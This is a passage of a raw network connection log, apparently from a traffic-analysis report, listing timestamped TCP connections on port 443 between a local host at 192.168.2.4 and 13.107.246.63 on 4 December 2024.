                                                                                                                                                                                  Dec 4, 2024 11:10:21.839134932 CET4434979313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:21.840488911 CET49793443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:21.840504885 CET4434979313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:21.840925932 CET49793443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:21.840930939 CET4434979313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:22.183684111 CET4434979213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:22.184215069 CET49792443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:22.184242964 CET4434979213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:22.184678078 CET49792443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:22.184684038 CET4434979213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:22.284769058 CET4434979313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:22.284837008 CET4434979313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:22.284888983 CET49793443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:22.285039902 CET49793443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:22.285062075 CET4434979313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:22.285072088 CET49793443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:22.285078049 CET4434979313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:22.287611008 CET49797443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:22.287643909 CET4434979713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:22.287713051 CET49797443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:22.287857056 CET49797443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:22.287863970 CET4434979713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:22.628093958 CET4434979213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:22.628154039 CET4434979213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:22.628232002 CET49792443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:22.628485918 CET49792443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:22.628505945 CET4434979213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:22.628521919 CET49792443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:22.628529072 CET4434979213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:22.632531881 CET49798443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:22.632569075 CET4434979813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:22.632648945 CET49798443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:22.632844925 CET49798443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:22.632858038 CET4434979813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:22.761543989 CET4434979413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:22.762012959 CET49794443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:22.762058973 CET4434979413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:22.762481928 CET49794443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:22.762489080 CET4434979413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:23.183248997 CET4434979613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:23.206099987 CET4434979413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:23.206161022 CET4434979413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:23.206216097 CET49794443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:23.209849119 CET49796443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:23.209875107 CET4434979613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:23.210273981 CET49794443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:23.210273981 CET49794443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:23.210294008 CET4434979413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:23.210308075 CET4434979413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:23.210686922 CET49796443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:23.210692883 CET4434979613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:23.213094950 CET49799443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:23.213141918 CET4434979913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:23.213205099 CET49799443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:23.213495970 CET49799443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:23.213510990 CET4434979913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:23.225905895 CET4434979513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:23.226228952 CET49795443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:23.226249933 CET4434979513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:23.226558924 CET49795443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:23.226563931 CET4434979513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:23.618685007 CET4434979613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:23.618746996 CET4434979613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:23.618815899 CET49796443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:23.619014025 CET49796443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:23.619028091 CET4434979613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:23.619036913 CET49796443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:23.619043112 CET4434979613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:23.621536970 CET49800443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:23.621567011 CET4434980013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:23.621634960 CET49800443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:23.621747971 CET49800443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:23.621758938 CET4434980013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:23.670941114 CET4434979513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:23.670994997 CET4434979513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:23.671047926 CET49795443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:23.671297073 CET49795443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:23.671297073 CET49795443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:23.671323061 CET4434979513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:23.671330929 CET4434979513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:23.676343918 CET49801443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:23.676367044 CET4434980113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:23.676433086 CET49801443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:23.677087069 CET49801443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:23.677098989 CET4434980113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:24.069348097 CET4434979713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:24.069859028 CET49797443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:24.069884062 CET4434979713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:24.070327044 CET49797443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:24.070334911 CET4434979713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:24.413037062 CET4434979813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:24.413594007 CET49798443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:24.413618088 CET4434979813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:24.414041996 CET49798443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:24.414045095 CET4434979813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:24.515396118 CET4434979713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:24.515444040 CET4434979713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:24.515491009 CET49797443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:24.515656948 CET49797443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:24.515682936 CET4434979713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:24.515693903 CET49797443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:24.515712976 CET4434979713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:24.518136024 CET49802443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:24.518218994 CET4434980213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:24.518322945 CET49802443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:24.518599033 CET49802443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:24.518629074 CET4434980213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:24.858541012 CET4434979813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:24.858601093 CET4434979813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:24.858661890 CET49798443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:24.858870983 CET49798443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:24.858885050 CET4434979813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:24.858895063 CET49798443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:24.858899117 CET4434979813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:24.861675978 CET49803443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:24.861696959 CET4434980313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:24.861777067 CET49803443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:24.861953974 CET49803443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:24.861965895 CET4434980313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:24.929488897 CET4434979913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:24.930041075 CET49799443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:24.930059910 CET4434979913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:24.930485964 CET49799443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:24.930493116 CET4434979913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:25.364506006 CET4434979913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:25.364567995 CET4434979913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:25.364626884 CET49799443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:25.364825010 CET49799443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:25.364849091 CET4434979913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:25.364864111 CET49799443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:25.364871025 CET4434979913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:25.367769003 CET49804443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:25.367800951 CET4434980413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:25.367912054 CET49804443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:25.368061066 CET49804443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:25.368074894 CET4434980413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:25.393135071 CET4434980113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:25.393584967 CET49801443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:25.393615007 CET4434980113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:25.394013882 CET49801443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:25.394018888 CET4434980113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:25.403924942 CET4434980013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:25.404206038 CET49800443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:25.404232025 CET4434980013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:25.404552937 CET49800443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:25.404558897 CET4434980013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:25.828144073 CET4434980113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:25.828203917 CET4434980113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:25.828272104 CET49801443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:25.828428030 CET49801443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:25.828443050 CET4434980113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:25.828452110 CET49801443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:25.828458071 CET4434980113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:25.830805063 CET49805443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:25.830847979 CET4434980513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:25.830919981 CET49805443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:25.831051111 CET49805443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:25.831062078 CET4434980513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:25.848496914 CET4434980013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:25.848546028 CET4434980013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:25.848593950 CET49800443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:25.848714113 CET49800443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:25.848726034 CET4434980013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:25.848736048 CET49800443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:25.848741055 CET4434980013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:25.850754023 CET49806443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:25.850790024 CET4434980613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:25.850858927 CET49806443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:25.850975990 CET49806443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:25.850987911 CET4434980613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:26.307962894 CET4434980213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:26.308531046 CET49802443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:26.308538914 CET4434980213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:26.309007883 CET49802443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:26.309015989 CET4434980213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:26.654565096 CET4434980313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:26.655088902 CET49803443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:26.655105114 CET4434980313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:26.655709982 CET49803443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:26.655714035 CET4434980313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:26.752135992 CET4434980213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:26.752202988 CET4434980213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:26.752253056 CET49802443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:26.752486944 CET49802443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:26.752505064 CET4434980213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:26.752515078 CET49802443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:26.752520084 CET4434980213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:26.755103111 CET49807443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:26.755151033 CET4434980713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:26.755222082 CET49807443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:26.755475998 CET49807443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:26.755490065 CET4434980713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:27.084512949 CET4434980413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:27.085320950 CET49804443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:27.085365057 CET4434980413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:27.085782051 CET49804443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:27.085789919 CET4434980413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:27.100018024 CET4434980313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:27.100087881 CET4434980313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:27.100146055 CET49803443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:27.100320101 CET49803443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:27.100320101 CET49803443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:27.100338936 CET4434980313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:27.100347042 CET4434980313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:27.103051901 CET49808443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:27.103076935 CET4434980813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:27.103173971 CET49808443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:27.103332043 CET49808443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:27.103343010 CET4434980813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:27.523778915 CET4434980413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:27.523850918 CET4434980413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:27.523937941 CET49804443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:27.524157047 CET49804443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:27.524177074 CET4434980413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:27.524188042 CET49804443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:27.524193048 CET4434980413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:27.527160883 CET49809443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:27.527203083 CET4434980913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:27.527293921 CET49809443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:27.527470112 CET49809443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:27.527486086 CET4434980913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:27.615648031 CET4434980513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:27.616239071 CET49805443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:27.616276026 CET4434980513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:27.616677046 CET49805443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:27.616683960 CET4434980513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:27.633331060 CET4434980613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:27.633702040 CET49806443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:27.633723021 CET4434980613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:27.634080887 CET49806443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:27.634087086 CET4434980613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:28.059690952 CET4434980513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:28.059750080 CET4434980513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:28.059801102 CET49805443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:28.059995890 CET49805443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:28.060014009 CET4434980513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:28.060022116 CET49805443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:28.060026884 CET4434980513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:28.062552929 CET49810443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:28.062594891 CET4434981013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:28.062649012 CET49810443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:28.062803984 CET49810443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:28.062813997 CET4434981013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:28.080455065 CET4434980613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:28.080502033 CET4434980613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:28.080550909 CET49806443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:28.080665112 CET49806443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:28.080674887 CET4434980613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:28.080694914 CET49806443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:28.080698967 CET4434980613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:28.082963943 CET49811443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:28.082988977 CET4434981113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:28.083066940 CET49811443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:28.083174944 CET49811443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:28.083184004 CET4434981113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:28.471678972 CET4434980713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:28.472170115 CET49807443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:28.472187042 CET4434980713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:28.472811937 CET49807443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:28.472817898 CET4434980713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:28.821613073 CET4434980813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:28.822088957 CET49808443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:28.822117090 CET4434980813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:28.822529078 CET49808443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:28.822532892 CET4434980813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:28.907834053 CET4434980713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:28.907906055 CET4434980713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:28.907975912 CET49807443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:28.908155918 CET49807443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:28.908178091 CET4434980713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:28.908189058 CET49807443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:28.908194065 CET4434980713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:28.910891056 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:28.910919905 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:28.910981894 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:28.911114931 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:28.911124945 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:29.256906033 CET4434980813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:29.256963968 CET4434980813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:29.257019997 CET49808443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:29.257230043 CET49808443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:29.257255077 CET4434980813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:29.257271051 CET49808443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:29.257277966 CET4434980813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:29.259860992 CET49813443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:29.259908915 CET4434981313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:29.259993076 CET49813443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:29.260262966 CET49813443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:29.260274887 CET4434981313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:29.306660891 CET4434980913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:29.307213068 CET49809443192.168.2.413.107.246.63
